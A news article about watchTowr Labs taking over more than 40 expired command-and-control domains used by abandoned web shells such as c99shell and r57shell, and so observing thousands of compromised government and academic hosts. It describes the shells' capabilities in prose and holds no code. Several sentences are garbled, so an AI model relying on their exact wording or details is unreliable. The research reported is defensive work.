At least 4,000 unique web backdoors previously deployed by various threat actors were captured by taking control of abandoned and outdated infrastructure for as little as $20 per domain.
Cybersecurity company watchTowr Labs said it completed the operation, registering more than 40 domain names that the backdoors were designed to use for command and control purposes (C2). In partnership with the Shadowserver Foundation, the domains involved in the study were processed.
“We hijacked backdoors (that depended on now-abandoned infrastructure and/or expired domains) that existed inside backdoors themselves, and have watched the results flow ever since,” watchTowr Labs CEO Benjamin Harris and researcher Alize Hammond said in the technical description last week.
“This capture allowed us to track compromised hosts as they ‘reported’ and in theory gave us command and control over those compromised hosts.”
Compromised entities identified by the beacon include government entities from Bangladesh, China, and Nigeria; and academic institutions in China, South Korea, and Thailand, among others.
Backdoors, which are nothing more than web shells designed to provide permanent remote access to target networks for later use, vary in scope and functionality –
- Simple web shells that are able to execute an attacker’s command using PHP code
- c99shell
- r57shell
- China Chopperweb shell known by China-nexus advanced persistent threat groups (APT).
Both c99shell and r57shell are full-featured web shells with the ability to execute arbitrary code or commands, perform file operations, deploy additional payloads, brute force FTP servers, and remove themselves from compromised nodes.
WatchTowr Labs said it has seen cases where script developers backdoored some of the web shells to leak the locations where they were deployed, thereby inadvertently handing control over to other threat actors.
The development appears a couple of months after the campaign revealed he spent just $20 to acquire an obsolete WHOIS server domain (“whois.dotmobiregistry(.)net”) associated with the .mobi top-level domain (TLD), identifying more than 135,000 unique systems that even communicated with the server after , as it was moved to “whois.nic(.)mobi.”
These included various private companies, such as VirusTotal, as well as mail servers for countless government, military, and university organizations. The .gov addresses belonged to Argentina, Bangladesh, Bhutan, Ethiopia, India, Indonesia, Israel, Pakistan, the Philippines, Ukraine, and the United States
“It’s somewhat encouraging to see attackers making the same mistakes as defenders,” watchTowr Labs said. “It’s easy to think that attackers are never wrong, but we’ve seen evidence of the opposite — boxes with open web shells, expired domains, and the use of software that was backdoored.”
